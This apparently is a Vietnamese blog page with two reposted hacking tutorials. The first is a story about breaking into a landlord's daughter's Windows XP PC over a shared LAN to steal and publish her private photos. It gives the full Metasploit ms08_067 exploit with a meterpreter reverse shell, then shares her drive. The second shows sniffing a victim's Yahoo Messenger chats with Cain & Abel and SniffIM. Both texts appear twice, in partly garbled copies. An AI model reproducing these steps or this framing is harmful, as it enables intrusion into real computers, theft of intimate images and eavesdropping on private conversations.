Wednesday, 19 June 2013
@Câu Chuyện Về Xâm Nhập Máy Tính Từ Xa Qua Lỗi Ms08_067_netapi
Câu chuyện như sau:
Tớ ở trọ trong 1 dãy trọ nọ, chủ nhà có đứa con gái thật xinh, lại nghe đồn có mấy cái clip và hình gì gì đó để trong máy tính, rất may là chủ nhà này có nối mạng cho anh em dãy trọ xài đóng phí, thế là mình và cô ấy cùng mạng Lan rồi. thế nhưng cô ấy không share thì làm ăn được gì, cô ấy dùng máy tính để bàn à, thường thì khoảng 70% máy tính để bàn dùng WinXp rồi, em này chắc gà mờ không update nên chắc nhiều lỗ hổng đây, hôm nay thấy em đang ngồi máy, mình chạy ngay về nhà mở Metasploit lên chuẩn bị quá trình xâm nhập máy em và cướp đống hình kia up lên mạng thôi he he
đầu tiên xác định xem có bao nhiêu máy đang nối mạng với mình
mở CMD dùng lệnh
ví dụ máy em ở đây mình lấy là VPP2 ( hihi thực ra là máy công ty mình )
ta xem ip máy em là gì nào
à IP em nó là 192.168.1.4
tốt rồi
mở Metasploit console lên nào
dùng lệnh sau
đây là câu lệnh dùng để exploit lỗi ms08_067_netapi đó
sau đó set payload nào
tiếp theo set lhost
sau đó set port mình lắng nghe
sau khi set xong ta
rồi ok mọi chuyện đã set xong
ta
chết cha nhầm, quên coi là ip của mình không phải là
set lại nào
rồi exploit nào
Máy em nó xài WinXp SP3 và thời gian xâm nhập lúc này là
ở đây nếu bạn set sai ip có thể set lại, không việc gì cả
sau đó exploit nếu máy trả về
ok, ở đây đã xâm nhập đc máy em nó rồi
vào My Network Places xem máy em nó vpp2 có share gì không?
chỉ thấy share có 1 cái thôi, không có gì quan trọng cả, mục đích là muốn lấy hình em nó thôi
trong Metasploit sau khi xâm nhập xong ta login vào cmd máy em nó, ở đây ta có thể làm mọi thứ dùng lệnh
đầu tiên ta share tất cả các ổ đĩa của em nó nào
bi giờ vào my network places lại xem nào
đó, bi giờ Quachdaigia là ổ E của em nó vào xem tha hồ thôi
tút đến đây là hết còn ai muốn làm gì thì làm trong cái cmd đó
lần sau mình sẽ hướng dẫn xâm nhập khi em nó mua Laptop và cài win7 nhé!!
Nguồn:http://my.opera.com/vn.null/blog/show.dml/60044492
Tớ ở trọ trong 1 dãy trọ nọ, chủ nhà có đứa con gái thật xinh, lại nghe đồn có mấy cái clip và hình gì gì đó để trong máy tính, rất may là chủ nhà này có nối mạng cho anh em dãy trọ xài đóng phí, thế là mình và cô ấy cùng mạng Lan rồi. thế nhưng cô ấy không share thì làm ăn được gì, cô ấy dùng máy tính để bàn à, thường thì khoảng 70% máy tính để bàn dùng WinXp rồi, em này chắc gà mờ không update nên chắc nhiều lỗ hổng đây, hôm nay thấy em đang ngồi máy, mình chạy ngay về nhà mở Metasploit lên chuẩn bị quá trình xâm nhập máy em và cướp đống hình kia up lên mạng thôi he he
Lưu ý: lỗ hổng này chỉ có trên WinXp Sp3 trở về trước thôi
đầu tiên xác định xem có bao nhiêu máy đang nối mạng với mình
mở CMD dùng lệnh
nàoNet View
ví dụ máy em ở đây mình lấy là VPP2 ( hihi thực ra là máy công ty mình )
ta xem ip máy em là gì nào
ping VPP2
Reply from 192.168.1.4: bytes=32 time<1ms ttl="64<br">Reply from 192.168.1.4: bytes=32 time<1ms ttl="64<br">Reply from 192.168.1.4: bytes=32 time<1ms ttl="64<br">Reply from 192.168.1.4: bytes=32 time<1ms ttl="64</p">
à IP em nó là 192.168.1.4
tốt rồi
mở Metasploit console lên nào
dùng lệnh sau
use exploit/windows/smb/ms08_067_netapi
đây là câu lệnh dùng để exploit lỗi ms08_067_netapi đó
sau đó set payload nào
set PAYLOAD windows/meterpreter/reverse_tcp
tiếp theo set lhost
<==đây là ip máy mìnhset lhost 192.168.1.2
sau đó set port mình lắng nghe
<== nghe ở cổng 4444set lport 4444
<== Ip của máy em nóset rhost 192.168.1.4
sau khi set xong ta
xem có gì rồi nàoshow options
rồi ok mọi chuyện đã set xong
ta
nó thôiexploit
chết cha nhầm, quên coi là ip của mình không phải là
mà là192.168.1.2
hihi192.168.1.3
set lại nào
set lhost 192.168.1.3
rồi exploit nào
Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.1.4
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.4:3173) at 2013-03-25 14:16:04 +0700
Máy em nó xài WinXp SP3 và thời gian xâm nhập lúc này là
2013-03-25 14:16:04
ở đây nếu bạn set sai ip có thể set lại, không việc gì cả
sau đó exploit nếu máy trả về
có nghĩa là xâm nhập thành công, còn nếu không là đã fixmeterpreter >
ok, ở đây đã xâm nhập đc máy em nó rồi
vào My Network Places xem máy em nó vpp2 có share gì không?
chỉ thấy share có 1 cái thôi, không có gì quan trọng cả, mục đích là muốn lấy hình em nó thôi
trong Metasploit sau khi xâm nhập xong ta login vào cmd máy em nó, ở đây ta có thể làm mọi thứ dùng lệnh
để vào cmdshell
đầu tiên ta share tất cả các ổ đĩa của em nó nào
net share Quachdaigia=e:\
bi giờ vào my network places lại xem nào
đó, bi giờ Quachdaigia là ổ E của em nó vào xem tha hồ thôi
tút đến đây là hết còn ai muốn làm gì thì làm trong cái cmd đó
lần sau mình sẽ hướng dẫn xâm nhập khi em nó mua Laptop và cài win7 nhé!!
Nguồn:http://my.opera.com/vn.null/blog/show.dml/60044492
Thursday, 13 June 2013
@Sử dụng kỹ thuật Sniffer và SniffIM để đọc lén nội dung chat
Ứng dụng kỹ thuật Sniffer ta có thể khai thác được rất nhiều thứ. Ở bài viết này, tôi sẽ sử dụng ToolCain & Abel để tiến hành nghe lén trên mạng, và tiến hành dùng Tool SniffIM để bắt những gói tin chat Yahoo!Messenger đi qua.
Ở bài Lab này tôi cũng sử dụng 2 PC: 1 máy XP làm Attacker (192.168.1.100), 1 máy 2K3 làm victim (192.168.1.101), 1 Router ADSL (192.168.1.1) và 1 Switch. Máy Victim đang log on Yahoo!Messenger và đang chat với anh yêu. Từ máy Attacker ta sẽ tiến hành bắt gói tin và dùng SniffIM để đọc thôi.
Để thực hiện được bài tuts này, bạn cần tham khảo qua bài viết Sử dụng kỹ thuật Sniffer để hack pass yahoo để biết cách sử dụng Tool Cain.
Bắt đầu thực hiện nào.
B1: Mở Cain & Abel, chọn card mạng giao tiếp, chọn máy cần Sniffer và tiến hành Sniffer.
Tôi không bàn đến vấn đề này nữa nhé!
B2: Mở Tool SniffIM lên, giao diện của chương trình như sau. Ta chọn Start Sniffer (cái mũi tên xanh lá).
B3: Chọn card mạng cần Sniff >> Ok và tiến hành ngồi chờ nhé.
Giả sử, victim đang chat với anh yêu của mình và không biết có ai đó đang nghe lén đoạn chat của mình.
B4: Xem gì kìa, toàn bộ nội dung chat của victim đã hiện lên rõ mồn một kìa...Thành công rồi đó.
Qua bài tuts này, tôi muốn cho anh em thấy công dụng của kỹ thuật Sniffer, nó có thể bắt mọi gói tin đi qua nó và tùy từng trường hợp mà ta có thể khai thác nó như thế nào. Và Cain & Abel là một trong những công cụ rất mạnh để thực hiện việc này
Nguồn: http://rootbiez.blogspot.com/2009/12/hacking-su-dung-ky-thuat-sniffer-va.html
Ở bài Lab này tôi cũng sử dụng 2 PC: 1 máy XP làm Attacker (192.168.1.100), 1 máy 2K3 làm victim (192.168.1.101), 1 Router ADSL (192.168.1.1) và 1 Switch. Máy Victim đang log on Yahoo!Messenger và đang chat với anh yêu. Từ máy Attacker ta sẽ tiến hành bắt gói tin và dùng SniffIM để đọc thôi.
Để thực hiện được bài tuts này, bạn cần tham khảo qua bài viết Sử dụng kỹ thuật Sniffer để hack pass yahoo để biết cách sử dụng Tool Cain.
Bắt đầu thực hiện nào.
B1: Mở Cain & Abel, chọn card mạng giao tiếp, chọn máy cần Sniffer và tiến hành Sniffer.
Tôi không bàn đến vấn đề này nữa nhé!
B2: Mở Tool SniffIM lên, giao diện của chương trình như sau. Ta chọn Start Sniffer (cái mũi tên xanh lá).
B3: Chọn card mạng cần Sniff >> Ok và tiến hành ngồi chờ nhé.
Qua bài tuts này, tôi muốn cho anh em thấy công dụng của kỹ thuật Sniffer, nó có thể bắt mọi gói tin đi qua nó và tùy từng trường hợp mà ta có thể khai thác nó như thế nào. Và Cain & Abel là một trong những công cụ rất mạnh để thực hiện việc này
Nguồn: http://rootbiez.blogspot.com/2009/12/hacking-su-dung-ky-thuat-sniffer-va.html
Subscribe to:
Posts (Atom)